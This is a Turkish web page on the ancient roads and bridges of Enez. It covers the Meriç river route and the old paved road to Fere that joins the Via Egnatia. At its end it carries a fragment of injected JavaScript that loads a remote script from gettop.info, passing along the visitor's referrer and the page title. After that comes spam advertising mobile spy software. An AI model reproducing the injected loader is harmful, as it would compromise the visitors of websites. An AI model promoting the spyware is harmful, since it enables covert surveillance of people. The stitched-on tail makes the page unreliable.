Yollar Ve Köprüler


Enez Eski Çağda çifte limanlı olarak ünlenmişti. Meriç Nehri 18. yüzyıla değin seyrüsefere açıktı ve bu su yolu ile Balkanlara ve Karadenize rahatlıkla ulaşılabiliyordu. Tarih boyunca Balkanların ve Trakya’nın ithalat ve ihracatını üstlenmiş olan  Meriç Nehri alüvyon sürükleyerek ağzını doldurunca bu su yolu ve limanlar kullanılamaz duruma gelmiştir. Enez’de bu yollarla birlikte  Eski Çağda  kara yolu ağı da gelişmişti. Bunların en önemlisi ve halen ayakta bulunanı yöre halkı arasında “Baba Öldüren Kaldırım” olarak bilinen, Enez – Fere arasını birleştiren, büyük blok taşlarla döşenmiş yoldur. Enez’den başlayan yol Hisarlı dağın etekleri ile Gala gölü arasındaki yamaçtan kuzeye ilerleyerek,  Döken Çiftliğinde kuzey batıya doğru kıvrılır. Bu kesimde Gala ile Armutlu Gölleri arasından geçerek Traianoupolis’te İstanbul-Roma arasında yer alan askeri ve ticaret yolu olan Via Egnatia ile birleşir.  Yol güzergahı üzerinde yer yer köprüler ve istasyonlar da yer almaktadır. (Resim 3  4)

} else {s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; document.currentScript.parentNode.insertBefore(s, document.currentScript);https://topspyapps.net - The most popular 2017 spy software applications for the mobile phones. Buy